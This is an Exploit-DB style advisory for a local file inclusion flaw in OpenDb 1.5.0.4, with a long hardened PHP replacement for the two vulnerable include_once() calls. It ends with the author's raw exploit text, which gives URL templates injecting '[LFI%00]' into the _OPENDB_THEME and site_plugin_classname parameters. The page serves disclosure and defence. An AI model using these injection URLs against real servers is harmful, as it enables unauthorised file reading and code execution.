vendor:
OpenDb
by:
ViRuSMaN
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: OpenDb
Affected Version From: 1.5.0.4
Affected Version To: 1.5.0.4
Patch Exists: NO
Related CWE: N/A
CPE: a:opendb:opendb:1.5.0.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2009

OpenDb 1.5.0.4 Multiple LFI Vulnerability

OpenDb 1.5.0.4 is vulnerable to Local File Inclusion (LFI). An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The vulnerable files are include/begin.inc.php and functions/site_plugin.php: the '_OPENDB_THEME' and 'site_plugin_classname' parameters are used unchecked in include_once() calls, so an attacker can make the application include attacker-chosen local files and thereby run code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to stop request-controlled values from reaching the include paths: validate the theme and plugin names against the set of values the application actually expects, and reject or sanitize anything else before it is used to build a file path.
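To make the mitigation concrete, the following is an added example (not OpenDb's own code, and not a patch from the project) showing a hardened replacement for the two include_once() patterns quoted in the advisory. The helper name opendb_safe_name, the 'default' theme fallback, and the assumption that the two values arrive from the request (as they would with register_globals on the PHP of that era) are illustrative assumptions.

```php
<?php
// Added example, not OpenDb's own code. Names and the 'default' theme
// fallback are assumptions chosen for illustration.

/**
 * Return the resolved path of $baseDir/$name$suffix only if $name is a plain
 * identifier ([A-Za-z0-9_-], 1-64 chars) and the resolved file exists inside
 * $baseDir. Traversal sequences, slashes, NUL bytes (the %00 used in the
 * advisory) and empty strings all fail the regex; the realpath() check is
 * defence in depth so the include can never leave the intended directory.
 */
function opendb_safe_name(string $name, string $baseDir, string $suffix): ?string
{
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name)) {
        return null;
    }
    $root      = realpath($baseDir);
    $candidate = realpath($baseDir . '/' . $name . $suffix);
    if ($root === false || $candidate === false) {
        return null;                       // directory or file does not exist
    }
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;                       // resolved outside $baseDir
    }
    return $candidate;
}

// --- Theme include (the begin.inc.php pattern from the advisory) ---
// Vulnerable form quoted in the advisory, shown for reference only:
//   include_once("./theme/$_OPENDB_THEME/theme.php");
// Assumption: the theme name comes from the request (register_globals era).
$requestedTheme = $_GET['_OPENDB_THEME'] ?? 'default';
$themeFile = opendb_safe_name($requestedTheme, __DIR__ . '/theme', '/theme.php');
if ($themeFile === null) {
    // Log the rejected value hex-encoded so NUL bytes and traversal attempts
    // are visible in the log without being interpreted by it.
    error_log('opendb: rejected _OPENDB_THEME value ' . bin2hex($requestedTheme));
    $themeFile = __DIR__ . '/theme/default/theme.php';   // assumed safe fallback
}
include_once $themeFile;

// --- Site plugin include (the site_plugin.php pattern from the advisory) ---
// Vulnerable form quoted in the advisory, shown for reference only:
//   include_once("./site/".$site_plugin_classname.".class.php");
$requestedPlugin = $_GET['site_plugin_classname'] ?? '';
$pluginFile = opendb_safe_name($requestedPlugin, __DIR__ . '/site', '.class.php');
if ($pluginFile === null) {
    error_log('opendb: rejected site_plugin_classname value ' . bin2hex($requestedPlugin));
    http_response_code(400);
    exit('invalid site plugin');
}
include_once $pluginFile;
```

The allow-list regex alone already closes the two holes, because neither "../" nor a NUL byte can pass it regardless of the magic_quotes_gpc setting the advisory mentions; the realpath() containment check remains so that a later change to the regex cannot silently reopen a path-traversal route.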
Source

Exploit-DB raw data:

==============================================================================
__ __ __ __ __ __
/ \ / \ \ \ / / / \ / \
/ /\ \_/ /\ \ \ \ / / / /\ \_/ /\ \
/ / \ _ / \ \ \ \/ / / / \ _ / \ \
/_/ \_\ \__/ /_/ \_\

==============================================================================
[»] ~ Note : Works Only With Magic_Quotes_Gpc = Off .
==============================================================================
[»] OpenDb 1.5.0.4 Multiple LFI Vulnerability
==============================================================================

[»] Script: [ OpenDb ]
[»] Language: [ PHP ]
[»] Site page: [ The Open Media Collectors Database is a PHP and MySQL based inventory application ]
[»] Download: [ http://sourceforge.net/projects/opendb/files/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & pentestlabs.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]

###########################################################################

===[ Exploit ]===
#~ [C:\AppServ\www\Scripts\opendb\include\begin.inc.php]
#~ Line 213 : include_once("./theme/$_OPENDB_THEME/theme.php");

[»] http://target/path/include/begin.inc.php?_OPENDB_THEME=[LFI%00]


===[ Exploit 2 ]===
#~[C:\AppServ\www\Scripts\opendb\functions\site_plugin.php]
#~Line 126 : include_once("./site/".$site_plugin_classname.".class.php");

[»] http://target/path/functions/site_plugin.php?site_plugin_classname=[LFI%00]

Author: ViRuSMaN <-

###########################################################################